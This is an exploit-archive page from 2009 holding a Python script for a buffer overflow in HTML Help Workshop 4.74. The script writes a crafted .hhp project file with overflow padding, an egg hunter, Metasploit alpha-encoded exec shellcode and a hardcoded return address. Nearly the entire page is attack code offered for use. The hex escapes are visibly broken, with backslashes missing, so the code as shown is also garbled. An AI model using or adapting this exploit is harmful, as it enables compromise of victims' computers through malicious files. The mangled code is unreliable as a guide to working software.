HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
# Published : 2009-12-05
# Author : Encrypt3d.M!Nd
# Previous Title : M3U To ASX-WPL 1.1 (m3u Playlist file) Buffer Overflow Exploit
# Next Title : Audacity 1.2.6 (gro File) Buffer overflow Exploit

#exploit.py
#
# HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
# By: Encrypt3d.M!nd
#     http://m1nd3d.wordpress.com/
# Based on: http://www.milw0rm.com/exploits/7727
####################################################################
# Well, I've tested SKD Exploit on Win 7 and didn't work.I Think it's
# Shellhunter compatibility problem. so i wrote this and used egg hunting-
# method. Would take some time to execute the shellcode,but it will run ;-)
#
#    Tested on : Windows xp sp3
#                Windows 7 ultimate
#



hhp_data1 =("x5Bx4Fx50x54x49x4Fx4Ex53"
	    "x5Dx0Dx0Ax43x6Fx6Ex74x65"
            "x6Ex74x73x20x66x69x6Cx65"
            "x3Dx41x0Dx0Ax49x6Ex64x65"
	    "x78x20x66x69x6Cx65x3D")

crlf      =("x0dx0a")

hhp_data2 =("x5Bx46x49x4Cx45x53x5Dx0D")

eggh= ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8x69x72x61x71x8BxFAxAFx75xEAxAFx75xE7xFFxE7")

overflow1= "x41" * 224


shellcode = "Devil_inside.htm"
shellcode+= "x69x72x61x71x69x72x61x71"
#
# windows/exec - 454 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=thread, CMD=calc
#
shellcode+=(
"x89xe5xdaxd6xd9x75xf4x5bx53x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x49x6cx4bx58x4cx49x47x70x47x70x43x30x45x30x4b"
"x39x4bx55x44x71x4ax72x51x74x4cx4bx50x52x44x70"
"x4cx4bx43x62x46x6cx4ex6bx42x72x47x64x4ex6bx42"
"x52x46x48x44x4fx4fx47x51x5ax45x76x50x31x4bx4f"
"x45x61x49x50x4ex4cx47x4cx45x31x51x6cx43x32x44"
"x6cx45x70x4ax61x4ax6fx46x6dx47x71x48x47x48x62"
"x48x70x46x32x50x57x4ex6bx51x42x42x30x4ex6bx42"
"x62x47x4cx43x31x4ex30x4cx4bx47x30x42x58x4dx55"
"x4fx30x44x34x42x6ax46x61x4ax70x42x70x4ex6bx42"
"x68x44x58x4cx4bx43x68x51x30x43x31x4ex33x49x73"
"x47x4cx42x69x4cx4bx45x64x4ex6bx46x61x4bx66x50"
"x31x49x6fx44x71x4fx30x4ex4cx4fx31x4ax6fx44x4d"
"x46x61x4fx37x46x58x4bx50x51x65x49x64x44x43x43"
"x4dx48x78x47x4bx43x4dx46x44x43x45x49x72x51x48"
"x4cx4bx46x38x51x34x47x71x4ax73x51x76x4ex6bx44"
"x4cx42x6bx4ex6bx43x68x45x4cx43x31x4bx63x4ex6b"
"x45x54x4cx4bx45x51x4ex30x4fx79x51x54x44x64x51"
"x34x51x4bx51x4bx51x71x42x79x43x6ax42x71x49x6f"
"x4dx30x51x48x51x4fx43x6ax4cx4bx44x52x48x6bx4c"
"x46x51x4dx43x5ax47x71x4cx4dx4cx45x4ex59x45x50"
"x43x30x43x30x46x30x51x78x50x31x4ex6bx42x4fx4c"
"x47x4bx4fx48x55x4fx4bx4dx30x47x6dx44x6ax47x7a"
"x50x68x49x36x4fx65x4fx4dx4dx4dx4bx4fx4ex35x47"
"x4cx44x46x43x4cx47x7ax4bx30x49x6bx4dx30x43x45"
"x43x35x4dx6bx43x77x45x43x42x52x42x4fx42x4ax43"
"x30x43x63x4bx4fx4ex35x50x63x51x71x50x6cx45x33"
"x45x50x41x41")

overflow2= "x42" * 24
ret = ("x93x1fx40x00") # Call Edi - hhw.exe (universal huh?)

file=open('Devil.hhp','w')
file.write(hhp_data1+overflow1+eggh+overflow2+ret+crlf+crlf+hhp_data2+crlf+shellcode+"x41"
* 4000)
file.close()